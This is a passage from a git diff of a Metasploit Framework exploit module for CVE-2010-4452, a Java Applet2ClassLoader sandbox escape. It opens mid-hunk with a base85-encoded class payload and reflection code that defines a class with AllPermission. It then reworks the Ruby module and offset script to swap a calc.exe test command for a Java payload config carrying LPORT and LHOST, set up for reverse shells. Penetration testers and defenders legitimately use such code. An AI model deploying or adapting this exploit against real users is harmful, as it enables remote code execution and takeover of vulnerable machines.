"-%SQw/t=~hv6JMSM+aXcR(0^eN#6GjQ;b]nv]S6uN,Dq^h~C(BP#3CD>Al'N%$$HH5#6G$" + + "H]QR$<$~jsN?W[=D10FVi+^>$Z]~NSw+.3aF3`$Pu&58a>Al&VK)c6V:_,*$r]ql-@%#,3" + + "p%=w_$$Y9Q]/ki#W%:KE]#4*:h)c7Jd3j8`q'MP-A$Y9N`]RU6*MPH;;u1.n(]M]Y%Xd9Z" + + "(]QR.UW_f$c$?eX;+liY80S0<$#6G'O0Mj[v$;_I[T1l])$=O'v'hkE1$=O$i#6J:>$;@A" + + "d13QBF]]0#(Xd>J[#6#'8$?f/(;<@lj3)$wm=a1%T=`sqS###%)##kS+#8.%Z#6=g0#'']" + + "I##5/(0O=`_[S6c8#u%t.#6HE^$V~$9##,+9##G;'##5/*#5~C(######87)H##,+.###%" + + ".##5/f#####^?6,i#6(,rUeJ5k(v_23U.i)n(vq>5V+e2m~_$oo#6&sQ]^HL1#60Wc^@2c" + + "i#612s##);Q#####").replace('~', '\\'); +byte[] payload = new byte[9132]; +for (int i = 0; i < DATA.length()/5; i++) { + long val=0; + for (int j = 0; j < 5; j++) val = val * 85 + (DATA.charAt(i*5+j)-'#'); + for (int j = 0; j < 4; j++, val >>= 8) payload[i*4+j] = (byte)val; +} +Class I = int.class, BA = byte[].class; +Class PD = java.security.ProtectionDomain.class; +final java.security.Permissions permissions = new java.security.Permissions(); +permissions.add(new java.security.AllPermission()); +final java.security.ProtectionDomain pd = new java.security.ProtectionDomain(new + java.security.CodeSource(new java.net.URL("file:///"), + new java.security.cert.Certificate[0]), permissions); +java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod("defineClass", + new Class[] {String.class, BA, I, I, PD}); +m.setAccessible(true); +Class c = (Class) m.invoke(new java.net.URLClassLoader(new java.net.URL[0]), + new Object[] {null, payload, new Integer(0), new Integer(1888), pd}); +byte[] payload2 = new byte[7244]; +System.arraycopy(payload, 1888, payload2, 0, 7244); +c.getConstructor(new Class[] {PD, BA, BA}) + .newInstance(new Object[] {pd, CONFIG.getBytes(), payload2}); } catch( Exception e ) { diff --git a/external/source/exploits/cve-2010-4452/get_offsets.rb b/external/source/exploits/cve-2010-4452/get_offsets.rb index 7278f34bf1..8b134e965b 100755 --- a/external/source/exploits/cve-2010-4452/get_offsets.rb +++ b/external/source/exploits/cve-2010-4452/get_offsets.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby +dat = nil dat = File.open(ARGV[0], 'rb') { |fd| fd.read } - -puts "cmd_off = 0x%x" % dat.index("\x00\x08calc.exe") -puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX") +if dat + puts "config_off = 0x%x" % dat.index("\x00\x08CONFIGZZ") + puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX") +else + "No data?!" +end diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 8858de1a62..da029586db 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -21,12 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super( update_info( info, 'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit', 'Description' => %q{ - This module exploits a vulnerability in Java Runtime Environment - that allows an attacker to escape the Java Sandbox. By supplying a - codebase that points at a trusted directory and a code that is a URL that - does not contain an dots an applet can run without the sandbox. + This module exploits a vulnerability in the Java Runtime Environment + that allows an attacker to run an applet outside of the Java Sandbox. When + an applet is invoked with: - The vulnerability affects version 6 prior to update 24. + 1. A "codebase" parameter that points at a trusted directory + 2. A "code" parameter that is a URL that does not contain any dots + + the applet will run outside of the sandbox. + + This vulnerability affects JRE prior to version 6 update 24. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -42,13 +46,30 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ] ], - 'Platform' => [ 'java', 'win' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Platform' => [ 'java' ], #, 'win' ], + 'Payload' => + { + 'Space' => 20480, + 'BadChars' => '', + 'DisableNops' => true, + 'Compat' => + { + # bind doesn't make much sense for client sides + 'ConnectionType' => '-find -bind' + } + }, 'Targets' => [ # OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23 # FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23 - [ 'Automatic (no payload)', { } ] + [ 'Generic (Java Payload)', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java', + } + ], + + # Native payloads aren't currently supported (only work with jar/war) =begin [ 'Windows x86', { @@ -56,12 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', } ], - [ 'Generic (Java Payload)', - { - 'Arch' => ARCH_JAVA, - 'Platform' => 'java', - } - ], =end ], 'DefaultTarget' => 0, @@ -70,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('CMD', [ false, "Command to run.", "calc.exe"]), + # This is the default for a 32-bit Windows install OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)", "C:\\Program Files\\java\\jre6\\lib\\ext"]), ], self.class) @@ -98,27 +113,37 @@ class Metasploit3 < Msf::Exploit::Remote # Do what get_uri does so that we can replace it in the string host = Rex::Socket.source_address(cli.peerhost) host_num = Rex::Socket.addr_aton(host).unpack('N').first - - codebase = "file:" + datastore['LIBPATH'] code_url = jpath.sub(host, host_num.to_s) - cmd = datastore['CMD'] - cmd_off = 0xb4 + codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext" + codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext" - cn_off = 0xfc + config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n" + # The java payloads decide to be reverse if LHOST is set. + config << "LHOST=#{datastore['LHOST']}\n" if datastore['PAYLOAD'] =~ /reverse/ + config_off = 0x10e + + cn_off = 0x2f76 case request.uri when /\.class$/ + # NOTE: the payload for this module is implemented in the .class file directly. + # + # This is due to the following: + # 1. The file must be a single .class file + # 2. The class inside must derive from Applet + # + # As such, we do not use the traditional payload generation facilities. #p = regenerate_payload(cli) print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...") cls = @java_class.dup - cls[cmd_off,2] = [cmd.length].pack('n') - cls[cmd_off+2,8] = cmd + cls[config_off,2] = [config.length].pack('n') + cls[config_off+2,8] = config - cn_off += (cmd.length - 8) # the original length was 8 (calc.exe) + cn_off += (config.length - 8) # the original length was 8 (CONFIGZZ) cls[cn_off,2] = [code_url.length].pack('n') cls[cn_off+2,7] = code_url @@ -137,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote EOS print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) - handler(cli) end end